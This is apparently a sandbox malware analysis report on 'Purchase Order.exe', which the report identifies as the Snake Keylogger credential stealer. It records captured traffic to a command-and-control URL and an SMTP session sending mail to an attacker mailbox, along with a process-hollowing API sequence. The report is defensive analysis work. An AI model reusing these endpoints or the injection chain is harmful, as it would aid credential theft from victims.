                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bKdabQl4yyidTFIfyA9%2BhU3KfLapgUhQ%2Fb%2Bkv%2BKv7Jn4kbszbwtFC3cPshegV0M863HUPChYYxXg2hLD2cDEVSoxkIQ%2B88shvslTb6bzooIE2fihTx0Dc4ZfzW16%2BShGRlUcvYJt"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec2d9f64dae9-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:28:01 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:28:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.549721104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:28:02 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          Connection: Keep-Alive
                                                                          2024-04-04 08:28:02 UTC704INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:28:02 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69863
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSd3jmotJCyLY9%2BoeuRLOf7jpGkjg8hvoWB2TVbhtOWNijNEWKhjB34Jhv3pZ8xkZ8L3TPmIHC0oH1U%2Fch0PyOEF0hmOcLtPLmDP6sH77X9kHSNRLlfLsVl0MMr1ByIK1nh6vc70"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec340eef8df1-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:28:02 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:28:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.549723104.21.67.1524433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:28:03 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                          Host: reallyfreegeoip.org
                                                                          2024-04-04 08:28:03 UTC714INHTTP/1.1 200 OK
                                                                          Date: Thu, 04 Apr 2024 08:28:03 GMT
                                                                          Content-Type: application/xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          Cache-Control: max-age=86400
                                                                          CF-Cache-Status: HIT
                                                                          Age: 69864
                                                                          Last-Modified: Wed, 03 Apr 2024 13:03:39 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BRPBDh9%2FsjepCdSIk%2Bkm2KQLv36UTEf6c1duLapZFd8CFz%2FHW4dQOQPASynI6UZT8InRlLZDlgvRfBHwDy4SdDjQmHegA0kOpIzBJ26%2B8QlkV%2FmMiMTSD7Q%2Fg8bf3S6adjU7lNO"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec3a78886dd4-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:28:03 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                          Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                          2024-04-04 08:28:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.549724172.67.169.184433304C:\Users\user\Desktop\Purchase Order.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-04 08:28:04 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                                          Host: scratchdreams.tk
                                                                          Connection: Keep-Alive
                                                                          2024-04-04 08:28:35 UTC735INHTTP/1.1 522
                                                                          Date: Thu, 04 Apr 2024 08:28:35 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 15
                                                                          Connection: close
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKSV0bYfqw%2BLXAaunqG4lr0VdHAe%2FQqNLyKJyY1uBcmv4PzfuQYGx8rnQnQtoXvEAtbGIKvjvIOIIBkl2u8XrRhF%2FEd4rskCJqjnWvBiE3gEVgySIYUutm3PwMH0TlGI3DBs"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Referrer-Policy: same-origin
                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                          Server: cloudflare
                                                                          CF-RAY: 86efec406aa6334f-MIA
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-04-04 08:28:35 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                          Data Ascii: error code: 522


                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                          Apr 4, 2024 10:28:41.735502958 CEST58749733208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Apr 4, 2024 10:28:41.735698938 CEST49733587192.168.2.5208.91.198.143EHLO 830021
                                                                          Apr 4, 2024 10:28:41.932111979 CEST58749733208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Apr 4, 2024 10:28:41.933192015 CEST49733587192.168.2.5208.91.198.143AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
                                                                          Apr 4, 2024 10:28:42.131150007 CEST58749733208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Apr 4, 2024 10:28:42.333214045 CEST58749733208.91.198.143192.168.2.5235 2.7.0 Authentication successful
                                                                          Apr 4, 2024 10:28:42.333444118 CEST49733587192.168.2.5208.91.198.143MAIL FROM:<tslogs@mksiimst.com>
                                                                          Apr 4, 2024 10:28:42.530410051 CEST58749733208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Apr 4, 2024 10:28:42.530620098 CEST49733587192.168.2.5208.91.198.143RCPT TO:<tslogs@mksiimst.com>
                                                                          Apr 4, 2024 10:28:42.746668100 CEST58749733208.91.198.143192.168.2.5550 5.4.6 <tslogs@mksiimst.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:10:27:47
                                                                          Start date:04/04/2024
                                                                          Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                          Imagebase:0x240000
                                                                          File size:545'792 bytes
                                                                          MD5 hash:654C1586B15A278983493F57F72CACB7
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:10:27:53
                                                                          Start date:04/04/2024
                                                                          Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                          Imagebase:0x340000
                                                                          File size:545'792 bytes
                                                                          MD5 hash:654C1586B15A278983493F57F72CACB7
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:10:27:53
                                                                          Start date:04/04/2024
                                                                          Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                          Imagebase:0xc70000
                                                                          File size:545'792 bytes
                                                                          MD5 hash:654C1586B15A278983493F57F72CACB7
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:9.9%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:212
                                                                            Total number of Limit Nodes:16
                                                                            execution_graph 18755 c2d1c0 18756 c2d1cd 18755->18756 18758 c2d207 18756->18758 18759 c2ba20 18756->18759 18761 c2ba2b 18759->18761 18760 c2df18 18761->18760 18763 c2d324 18761->18763 18764 c2d32f 18763->18764 18767 c270f0 18764->18767 18766 c2df87 18766->18760 18768 c270fb 18767->18768 18769 c2886b 18768->18769 18771 c2af19 18768->18771 18769->18766 18775 c2af50 18771->18775 18778 c2af3f 18771->18778 18772 c2af2e 18772->18769 18782 c2b038 18775->18782 18776 c2af5f 18776->18772 18779 c2af50 18778->18779 18781 c2b038 2 API calls 18779->18781 18780 c2af5f 18780->18772 18781->18780 18783 c2b059 18782->18783 18784 c2b07c 18782->18784 18783->18784 18790 c2b2d0 18783->18790 18794 c2b2e0 18783->18794 18784->18776 18785 c2b074 18785->18784 18786 c2b280 GetModuleHandleW 18785->18786 18787 c2b2ad 18786->18787 18787->18776 18791 c2b2f4 18790->18791 18792 c2b319 18791->18792 18798 c2a408 18791->18798 18792->18785 18795 c2b2f4 18794->18795 18796 c2b319 18795->18796 18797 c2a408 LoadLibraryExW 18795->18797 18796->18785 18797->18796 18799 c2b4c0 LoadLibraryExW 18798->18799 18801 c2b539 18799->18801 18801->18792 18802 c2d920 DuplicateHandle 18803 c2d9b6 18802->18803 18850 6d64743 18851 6d64751 18850->18851 18852 6d64749 18850->18852 18857 6d650f6 18852->18857 18872 6d65088 18852->18872 18886 6d65098 18852->18886 18853 6d64963 18858 6d65084 18857->18858 18860 6d650f9 18857->18860 18859 6d650d6 18858->18859 18900 6d658d0 18858->18900 18907 6d65475 18858->18907 18911 6d65565 18858->18911 18915 6d654d7 18858->18915 18922 6d65899 18858->18922 18929 6d6550b 18858->18929 18936 6d65a0a 18858->18936 18945 6d656fc 18858->18945 18949 6d65baf 18858->18949 18954 6d656cf 18858->18954 18961 6d65ae1 18858->18961 18859->18853 18860->18853 18873 6d65098 18872->18873 18874 6d650d6 18873->18874 18875 6d654d7 4 API calls 18873->18875 18876 6d65565 2 API calls 18873->18876 18877 6d65475 2 API calls 18873->18877 18878 6d658d0 4 API calls 18873->18878 18879 6d65ae1 4 API calls 18873->18879 18880 6d656cf 4 API calls 18873->18880 18881 6d65baf 2 API calls 18873->18881 18882 6d656fc 2 API calls 18873->18882 18883 6d65a0a 6 API calls 18873->18883 18884 6d6550b 4 API calls 18873->18884 18885 6d65899 4 API calls 18873->18885 18874->18853 18875->18874 18876->18874 18877->18874 18878->18874 18879->18874 18880->18874 18881->18874 18882->18874 18883->18874 18884->18874 18885->18874 18887 6d650b2 18886->18887 18888 6d650d6 18887->18888 18889 6d654d7 4 API calls 18887->18889 18890 6d65565 2 API calls 18887->18890 18891 6d65475 2 API calls 18887->18891 18892 6d658d0 4 API calls 18887->18892 18893 6d65ae1 4 API calls 18887->18893 18894 6d656cf 4 API calls 18887->18894 18895 6d65baf 2 API calls 18887->18895 18896 6d656fc 2 API calls 18887->18896 18897 6d65a0a 6 API calls 18887->18897 18898 6d6550b 4 API calls 18887->18898 18899 6d65899 4 API calls 18887->18899 18888->18853 18889->18888 18890->18888 18891->18888 18892->18888 18893->18888 18894->18888 18895->18888 18896->18888 18897->18888 18898->18888 18899->18888 18901 6d654cd 18900->18901 18902 6d65e67 18901->18902 18905 6d63e70 Wow64SetThreadContext 18901->18905 18906 6d63e6a Wow64SetThreadContext 18901->18906 18970 6d63dc0 18901->18970 18974 6d63db8 18901->18974 18905->18901 18906->18901 18978 6d64285 18907->18978 18982 6d64290 18907->18982 18986 6d64000 18911->18986 18990 6d64008 18911->18990 18912 6d65598 18916 6d654cd 18915->18916 18917 6d65e67 18916->18917 18918 6d63dc0 ResumeThread 18916->18918 18919 6d63db8 ResumeThread 18916->18919 18920 6d63e70 Wow64SetThreadContext 18916->18920 18921 6d63e6a Wow64SetThreadContext 18916->18921 18918->18916 18919->18916 18920->18916 18921->18916 18923 6d654cd 18922->18923 18924 6d65e67 18923->18924 18925 6d63dc0 ResumeThread 18923->18925 18926 6d63db8 ResumeThread 18923->18926 18927 6d63e6a Wow64SetThreadContext 18923->18927 18928 6d63e70 Wow64SetThreadContext 18923->18928 18925->18923 18926->18923 18927->18923 18928->18923 18994 6d63f40 18929->18994 18998 6d63f48 18929->18998 18930 6d6552c 18931 6d65eeb 18930->18931 18932 6d64000 WriteProcessMemory 18930->18932 18933 6d64008 WriteProcessMemory 18930->18933 18931->18859 18932->18930 18933->18930 19002 6d640f1 18936->19002 19006 6d640f8 18936->19006 18937 6d65a73 18938 6d654cd 18938->18937 18939 6d63dc0 ResumeThread 18938->18939 18940 6d63db8 ResumeThread 18938->18940 18941 6d63e70 Wow64SetThreadContext 18938->18941 18942 6d63e6a Wow64SetThreadContext 18938->18942 18939->18938 18940->18938 18941->18938 18942->18938 18947 6d64000 WriteProcessMemory 18945->18947 18948 6d64008 WriteProcessMemory 18945->18948 18946 6d656a3 18947->18946 18948->18946 18950 6d65bb5 18949->18950 18951 6d65eeb 18950->18951 18952 6d64000 WriteProcessMemory 18950->18952 18953 6d64008 WriteProcessMemory 18950->18953 18951->18859 18952->18950 18953->18950 18956 6d654cd 18954->18956 18955 6d65e67 18956->18955 18957 6d63e70 Wow64SetThreadContext 18956->18957 18958 6d63e6a Wow64SetThreadContext 18956->18958 18959 6d63dc0 ResumeThread 18956->18959 18960 6d63db8 ResumeThread 18956->18960 18957->18956 18958->18956 18959->18956 18960->18956 19010 6d63e6a 18961->19010 19014 6d63e70 18961->19014 18962 6d654cd 18962->18961 18963 6d65e67 18962->18963 18966 6d63dc0 ResumeThread 18962->18966 18967 6d63db8 ResumeThread 18962->18967 18968 6d63e70 Wow64SetThreadContext 18962->18968 18969 6d63e6a Wow64SetThreadContext 18962->18969 18966->18962 18967->18962 18968->18962 18969->18962 18971 6d63e00 ResumeThread 18970->18971 18973 6d63e31 18971->18973 18973->18901 18975 6d63dc0 ResumeThread 18974->18975 18977 6d63e31 18975->18977 18977->18901 18979 6d64319 CreateProcessA 18978->18979 18981 6d644db 18979->18981 18983 6d64319 CreateProcessA 18982->18983 18985 6d644db 18983->18985 18987 6d64008 WriteProcessMemory 18986->18987 18989 6d640a7 18987->18989 18989->18912 18991 6d64050 WriteProcessMemory 18990->18991 18993 6d640a7 18991->18993 18993->18912 18995 6d63f48 VirtualAllocEx 18994->18995 18997 6d63fc5 18995->18997 18997->18930 18999 6d63f88 VirtualAllocEx 18998->18999 19001 6d63fc5 18999->19001 19001->18930 19003 6d640f8 ReadProcessMemory 19002->19003 19005 6d64187 19003->19005 19005->18938 19007 6d64143 ReadProcessMemory 19006->19007 19009 6d64187 19007->19009 19009->18938 19011 6d63e70 Wow64SetThreadContext 19010->19011 19013 6d63efd 19011->19013 19013->18962 19015 6d63eb5 Wow64SetThreadContext 19014->19015 19017 6d63efd 19015->19017 19017->18962 18804 6d66710 18805 6d6689b 18804->18805 18806 6d66736 18804->18806 18806->18805 18808 6d66240 18806->18808 18809 6d66990 PostMessageW 18808->18809 18810 6d669fc 18809->18810 18810->18806 19018 6d68500 FindCloseChangeNotification 19019 6d68567 19018->19019 18811 c24668 18812 c2467a 18811->18812 18813 c24686 18812->18813 18817 c24779 18812->18817 18822 c23e34 18813->18822 18815 c246a5 18818 c2479d 18817->18818 18826 c24888 18818->18826 18830 c24879 18818->18830 18823 c23e3f 18822->18823 18838 c25e4c 18823->18838 18825 c27450 18825->18815 18827 c248af 18826->18827 18829 c2498c 18827->18829 18834 c244b4 18827->18834 18831 c248af 18830->18831 18832 c244b4 CreateActCtxA 18831->18832 18833 c2498c 18831->18833 18832->18833 18835 c25918 CreateActCtxA 18834->18835 18837 c259db 18835->18837 18839 c25e57 18838->18839 18842 c27090 18839->18842 18841 c2750d 18841->18825 18843 c2709b 18842->18843 18846 c270c0 18843->18846 18845 c275e2 18845->18841 18847 c270cb 18846->18847 18848 c270f0 2 API calls 18847->18848 18849 c276e5 18848->18849 18849->18845 19020 c2d6d8 19021 c2d71e GetCurrentProcess 19020->19021 19023 c2d770 GetCurrentThread 19021->19023 19024 c2d769 19021->19024 19025 c2d7a6 19023->19025 19026 c2d7ad GetCurrentProcess 19023->19026 19024->19023 19025->19026 19027 c2d7e3 GetCurrentThreadId 19026->19027 19029 c2d83c 19027->19029
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 635f0190be8e91ee18756272eda58ec8ec62f45ee53dff561b93ff8179fab790
                                                                            • Instruction ID: 594502253dfae3933b3c8e9700f2fd8699ab2c254492e96de0a353043aa147b3
                                                                            • Opcode Fuzzy Hash: 635f0190be8e91ee18756272eda58ec8ec62f45ee53dff561b93ff8179fab790
                                                                            • Instruction Fuzzy Hash: C4D1CA70B017048FDBA5DB76C850BAEB7F6AF88300F1484A9E156CB691DF35D801DBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 557 c2d6d8-c2d767 GetCurrentProcess 561 c2d770-c2d7a4 GetCurrentThread 557->561 562 c2d769-c2d76f 557->562 563 c2d7a6-c2d7ac 561->563 564 c2d7ad-c2d7e1 GetCurrentProcess 561->564 562->561 563->564 565 c2d7e3-c2d7e9 564->565 566 c2d7ea-c2d802 564->566 565->566 570 c2d80b-c2d83a GetCurrentThreadId 566->570 571 c2d843-c2d8a5 570->571 572 c2d83c-c2d842 570->572 572->571
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 00C2D756
                                                                            • GetCurrentThread.KERNEL32 ref: 00C2D793
                                                                            • GetCurrentProcess.KERNEL32 ref: 00C2D7D0
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C2D829
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2013861741.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c20000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: c2598f109c8af732b17ce9d5618d4690df5df690aa5c20f054e490ba8737a604
                                                                            • Instruction ID: 9b0cb4efd1c24d789e28442b998355f460a01f9fb9f8674fac3920155fa4b189
                                                                            • Opcode Fuzzy Hash: c2598f109c8af732b17ce9d5618d4690df5df690aa5c20f054e490ba8737a604
                                                                            • Instruction Fuzzy Hash: E75146B4D002098FDB14DFAAE548BDEBBF1FF88304F208459E459A7351DB745984CB66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 653 6d64285-6d64325 655 6d64327-6d64331 653->655 656 6d6435e-6d6437e 653->656 655->656 657 6d64333-6d64335 655->657 663 6d643b7-6d643e6 656->663 664 6d64380-6d6438a 656->664 658 6d64337-6d64341 657->658 659 6d64358-6d6435b 657->659 661 6d64345-6d64354 658->661 662 6d64343 658->662 659->656 661->661 665 6d64356 661->665 662->661 670 6d6441f-6d644d9 CreateProcessA 663->670 671 6d643e8-6d643f2 663->671 664->663 666 6d6438c-6d6438e 664->666 665->659 668 6d64390-6d6439a 666->668 669 6d643b1-6d643b4 666->669 672 6d6439e-6d643ad 668->672 673 6d6439c 668->673 669->663 684 6d644e2-6d64568 670->684 685 6d644db-6d644e1 670->685 671->670 674 6d643f4-6d643f6 671->674 672->672 675 6d643af 672->675 673->672 676 6d643f8-6d64402 674->676 677 6d64419-6d6441c 674->677 675->669 679 6d64406-6d64415 676->679 680 6d64404 676->680 677->670 679->679 681 6d64417 679->681 680->679 681->677 695 6d6456a-6d6456e 684->695 696 6d64578-6d6457c 684->696 685->684 695->696 697 6d64570 695->697 698 6d6457e-6d64582 696->698 699 6d6458c-6d64590 696->699 697->696 698->699 702 6d64584 698->702 700 6d64592-6d64596 699->700 701 6d645a0-6d645a4 699->701 700->701 703 6d64598 700->703 704 6d645b6-6d645bd 701->704 705 6d645a6-6d645ac 701->705 702->699 703->701 706 6d645d4 704->706 707 6d645bf-6d645ce 704->707 705->704 709 6d645d5 706->709 707->706 709->709
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D644C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2018394904.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6d60000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: f3e7f6f4f03ad6e6d8e909ebf6ee2cd861a2c48e230c27dc4f1d44494d67cd14
                                                                            • Instruction ID: 3062bcc77e212f529250bb580c3f6471459ed1107eab132d2e862e81e630b769
                                                                            • Opcode Fuzzy Hash: f3e7f6f4f03ad6e6d8e909ebf6ee2cd861a2c48e230c27dc4f1d44494d67cd14
                                                                            • Instruction Fuzzy Hash: E4A15971D00219CFDB64DF69C8417EDBBF2BF49314F1485A9E809A7280DB74A985CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
